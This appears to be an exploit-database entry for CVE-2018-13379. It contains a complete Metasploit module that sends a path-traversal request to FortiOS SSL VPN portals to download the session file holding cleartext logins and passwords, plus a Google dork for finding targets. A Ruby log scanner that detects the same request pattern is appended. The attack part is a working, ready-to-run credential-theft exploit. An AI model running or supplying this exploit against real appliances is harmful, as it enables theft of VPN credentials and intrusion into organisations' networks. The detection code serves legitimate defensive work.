FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)

19 Aug 2019 00:00:00 | Reported by Carlos E. Vieira | Type: exploitpack

FortiOS system file leak through the SSL VPN via specially crafted HTTP resource requests. This exploit reads logins and passwords in clear text from the /dev/cmdb/sslvpn_websession file. Affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affects FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4.
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File # provides file_local_write

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SSL VPN FortiOs - System file leak',
      'Description'    => %q{
        FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
        This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
        This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
      },
      'References'     =>
        [
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
        ],
      'Author'         => [ 'lynx (Carlos Vieira)' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL' => true
        }
    ))
  end

  # Request the session file through the lang parameter of /remote/fgt_lang
  # and save the response body to a local file named after RHOST.
  def run()
    print_good("Checking target...")
    res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})

    if res && res.code == 200
      # HTTP 200 is treated as a successful read of the file.
      print_good("Target is Vulnerable!")
      data = res.body
      current_host = datastore['RHOST']
      filename = "msf_sslwebsession_"+current_host+".bin"
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing binary file.......")
      parse()
    else
      if(res && res.code == 404)
        print_error("Target not Vulnerable")
      else
        print_error("Ow crap, try again...")
      end
    end
  end

  # Print the saved file as text: non-printable bytes become '.', the result
  # is split into 60-character chunks, and chunks made only of dots are skipped.
  def parse()
    current_host = datastore['RHOST']

    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
    while (line = fileObj.gets)
      printable_data = line.gsub(/[^[:print:]]/, '.')
      array_data = printable_data.scan(/.{1,60}/m)
      for ar in array_data
        if ar != "............................................................"
          print_good(ar)
        end
      end
      #print_good(printable_data)
    end
    fileObj.close
  end
end
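
A defender-side check for the request this module sends, added here as an example (it is not part of the original module or of any Fortinet tooling): it scans web access logs for `/remote/fgt_lang` requests whose `lang` value, once percent-decoded, contains a path separator or `..`. The combined log format, the sample lines, and the premise that the logs come from a proxy or WAF in front of the SSL VPN portal are assumptions, as is the premise that legitimate `lang` values are short language codes such as `en`.

```ruby
require 'uri'

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [19/Aug/2019:10:01:12 +0000] "GET /remote/fgt_lang?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.9 - - [19/Aug/2019:10:02:40 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 20480 "-" "-"
  203.0.113.9 - - [19/Aug/2019:10:02:55 +0000] "GET /remote/fgt_lang?lang=%2f%2e%2e%2f%2e%2e%2fdev%2fcmdb%2fsslvpn_websession HTTP/1.1" 404 0 "-" "-"
  198.51.100.7 - - [19/Aug/2019:10:03:01 +0000] "GET /remote/login?lang=en HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
LOG

LINE_RE = /\A(?<ip>\S+) .*?"[A-Z]+ (?<target>\S+) [^"]*" (?<status>\d{3}) /

# Percent-decode up to three times so double-encoded separators are still seen.
def fully_decode(value)
  3.times do
    decoded = URI.decode_www_form_component(value).scrub('?')
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError # malformed %-escape: inspect the value as far as it decoded
  value
end

# Return one finding per request to /remote/fgt_lang whose decoded lang value
# contains a path separator or a parent-directory sequence.
def find_fgt_lang_traversal(log_text)
  log_text.each_line.filter_map do |line|
    m = LINE_RE.match(line) or next
    path, query = m[:target].split('?', 2)
    next unless fully_decode(path) == '/remote/fgt_lang' && query
    raw = query.split('&').map { |kv| kv.split('=', 2) }
               .find { |k, _| k == 'lang' }&.last or next
    lang = fully_decode(raw)
    next unless lang.include?('/') || lang.include?('\\') || lang.include?('..')
    # served: the module treats HTTP 200 as a successful read of the file.
    { ip: m[:ip], status: m[:status].to_i, lang: lang,
      served: m[:status] == '200' }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_fgt_lang_traversal(SAMPLE_LOG).each { |hit| puts hit.inspect }
end
```

A finding with `served: true` means the response matched what the module counts as a leak, so sessions active at that time should be treated as exposed and their credentials rotated after upgrading out of the affected version ranges.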

Vulners AI Score: 10 (High risk) | EPSS: 0.99999